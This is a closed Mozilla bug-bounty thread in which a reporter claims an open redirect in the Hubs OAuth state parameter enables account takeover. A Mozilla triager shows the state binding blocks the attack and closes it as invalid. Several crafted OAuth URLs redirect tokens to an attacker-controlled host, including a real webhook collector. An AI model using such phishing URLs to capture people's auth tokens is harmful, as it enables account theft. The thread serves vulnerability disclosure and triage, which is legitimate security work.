Closed Bug 1826674 Opened 3 years ago Closed 3 years ago

Account takeover on open redirect state= parameter

Categories

(Websites :: Hubs, defect)

Product:
Websites
Component:
Hubs
Type:
defect

Tracking

(Not tracked)

Status:
RESOLVED INVALID

People

(Reporter: verticaldark17, Unassigned)

References

(
URL
)

Details

(Keywords: reporter-external, Whiteboard: [reporter-external] [web-bounty-form] [verif?])

Attachments

(3 files)

PoC
82 bytes, text/plain
Details
not-authorized-error
50.12 KB, image/png
Details
not-authorized-error-on-production
52.13 KB, image/png
Details

Hi team, I found an open redirect vulnerability that can be escalated to account takeover via state= parameter

Payload :
I am using HTTP/Webhook Request to get victim token

https://eoawv1snggf7u7g.m.pipedream.net

Steps & Reproduce :

Attached file PoC

Hello Muhammad,

Thank you for your report.

I was able to reproduce the issue. The Hubs dashboard on production is not reachable so I tested on staging.

The URL used for authentication is:

https://accounts.stage.mozaws.net/oauth/?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=<state>%3Afxa%3Ahttps%3A%2F%2Fdashboard.dev.myhubs.net

replace the hubs domain with the attackers server:

https://accounts.stage.mozaws.net/oauth/?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=<state>%3Afxa%3Ahttps%3A%2F%2F<attacker-controlled-url>

you will be redirected to:
https://<attacker-controlled-url>/?_turkeyauthtoken=<generated token>

However, the state parameter has to be valid, when I use the state parameter on a different browser or in a private tab, I get Not Authorized error. The attack depends on having the victim click on a phishing link which replaces the hubs domain with the attacker controlled domain, but the attacker needs a valid state parameter. How will the attack generate a valid state parameter to include in the phishing link?

I believe this is an issue in how Hubs integrates with Firefox accounts (FxA), not a problem in FxA, were you able to reproduce the problem for other products which rely on Fxa for authentication?

Thanks,
Frida

Status: UNCONFIRMED → NEW
Type: task → defect
Component: Other → Hubs
Ever confirmed: true

the specs has more details on the state parameter: https://www.rfc-editor.org/rfc/rfc6819#section-3.6, which mentions that the state parameter protects against this type of attack, since the parameter is bound to a specific client.

(In reply to Frida K [:frida] from comment #2)

Hello Muhammad,

Thank you for your report.

I was able to reproduce the issue. The Hubs dashboard on production is not reachable so I tested on staging.

The URL used for authentication is:

https://accounts.stage.mozaws.net/oauth/?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=<state>%3Afxa%3Ahttps%3A%2F%2Fdashboard.dev.myhubs.net

replace the hubs domain with the attackers server:

https://accounts.stage.mozaws.net/oauth/?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=<state>%3Afxa%3Ahttps%3A%2F%2F<attacker-controlled-url>

you will be redirected to:
https://<attacker-controlled-url>/?_turkeyauthtoken=<generated token>

However, the state parameter has to be valid, when I use the state parameter on a different browser or in a private tab, I get Not Authorized error. The attack depends on having the victim click on a phishing link which replaces the hubs domain with the attacker controlled domain, but the attacker needs a valid state parameter. How will the attack generate a valid state parameter to include in the phishing link?

I believe this is an issue in how Hubs integrates with Firefox accounts (FxA), not a problem in FxA, were you able to reproduce the problem for other products which rely on Fxa for authentication?

Thanks,
Frida

Thank you for your answer.

However, in the video I attached it is firefox browser and chrome. and I have also used on opera browser and OPPO mobile's default browser and all of them can reproduce.

and I have tried on several other products and the result is that their state= parameter has been encrypted.
take a look at getpocket :

https://accounts.firefox.com/oauth/?client_id=749818d3f2e7857f&state=6ddf950b40bfe13cbf8efeb5450d49e9&scope=profile%3Auid%2Bprofile%3Aemail%2Bprofile%3Adisplay_name&action=signin&s=pocket

state parameters are encrypted and cannot be modified by an attacker

here I think that the error lies in the misconfiguration of the unencrypted state parameter in this case

I am not able to reproduce the issue when generating the state parameter on one browser and trying to get a victim to login on another browser, as you can see in the screenshot.

can you try with this URL generated on my browser: https://accounts.stage.mozaws.net/oauth/signin?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=4b7d79591499c168dd3138193fc4ad71%3Afxa%3Ahttps%3A%2F%2Fdashboard.dev.myhubs.net

Thanks,
Frida

Attached image not-authorized-error

(In reply to Frida K [:frida] from comment #5)

I am not able to reproduce the issue when generating the state parameter on one browser and trying to get a victim to login on another browser, as you can see in the screenshot.

can you try with this URL generated on my browser: https://accounts.stage.mozaws.net/oauth/signin?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=4b7d79591499c168dd3138193fc4ad71%3Afxa%3Ahttps%3A%2F%2Fdashboard.dev.myhubs.net

Thanks,
Frida

Hi, I want to confirm this.
I also get an Unauthorized error.

It looks like this state parameter only passes external domains not allowing javascript redirects.

But I'm still confused by the description above, why is this url I found passed to an external site, but when you try to test it on staging it gets an error Not Authorized

Can you log into the victim's account using the token?

Flags: needinfo?(fkiriakos)

(In reply to Frida K [:frida] from comment #5)

I am not able to reproduce the issue when generating the state parameter on one browser and trying to get a victim to login on another browser, as you can see in the screenshot.

can you try with this URL generated on my browser: https://accounts.stage.mozaws.net/oauth/signin?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=4b7d79591499c168dd3138193fc4ad71%3Afxa%3Ahttps%3A%2F%2Fdashboard.dev.myhubs.net

Thanks,
Frida

Hi, after I noticed and tried.
I found something. please try logging in with this url you posted before:

https://accounts.stage.mozaws.net/oauth/signin?client_id=2db93e6523561502&entrypoint=auth.dev.myhubs.net&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=4b7d79591499c168dd3138193% c47ad1%c47ad1%c47ad1% 3Afxa%3Ahttps%3A%2F%2Fdashboard.dev.myhubs.net

if you use "dashboard.dev.myhubs.net" you will also get Unauthorized error.

is there an error in the staging test?

I don't think there is a problem with the staging server, this is how the application is supposed to work. I am still not able to access the production instance, I will check with the team if there is a problem there. I will test on production when I get the chance.

If you were able to generate the token for the victim, then you can login, we confirmed that. However, for the attack to be successful, you need to trick the users into authenticating so that you can get their authentication token, and this part is not possible because of the state parameter.

Flags: needinfo?(fkiriakos)

I just tried testing on production and I get the same error. I think the state parameter is serving its purpose and protecting against this attack.

I just need to submit the url below to get the victim token :

https://accounts.firefox.com/oauth/signin?client_id=34bc0d0a6add7329&entrypoint=auth.myhubs.dev&scope=profile%2Bopenid%2Bhttps%3A%2F%2Fidentity.mozilla.com%2Faccount%2Fsubscriptions&state=89d2f3f041a7f8210e7cd3904536 3A%2F%2Fhttps://eoawv1snggf7u7g.m.pipedream.net/

When the victim is redirected to eoawv1snggf7u7g.m.pipedream.net I get a parameter containing the victim's token and I can do a takeover there

I just tried the URL you posted in comment 17 and comment 18, and I got Not Authorized error.

Logging in with the victim's account only works if you use the state parameter you generated in a client then try to login with this URL on the same client.

For an account takeover scenario, the below should happen:

  1. generate the oauth url which has the attacker's controlled domain in the attacker's client
  2. trick the user into clicking the url and logging in with their Firefox account.
  3. receive the authtoken generated for the user on the attacker's end.

In Hubs case, the second step is not working because the state parameter generated on the attacker's client is not valid on the victim's client, therefore, we are getting the Not Authorized error.

I see, sorry I'm not paying enough attention to this. after I search correctly according to your opinion

To make sure I understood your comment correctly, do you agree that the account takeover is not actually possible because of the state parameter?

Thanks,
Frida

I'm not saying that account takeover is not possible, currently account takeover is possible by an attacker on his account, but it is not possible to attack someone.

but I think in the future it will be dangerous if this continues

I am glad we were able to come to an agreement. I believe that we are implementing the necessary mitigations against this risk, therefore, I am closing this report as invalid.

Thanks again for your report.

Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → INVALID
Group: websites-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: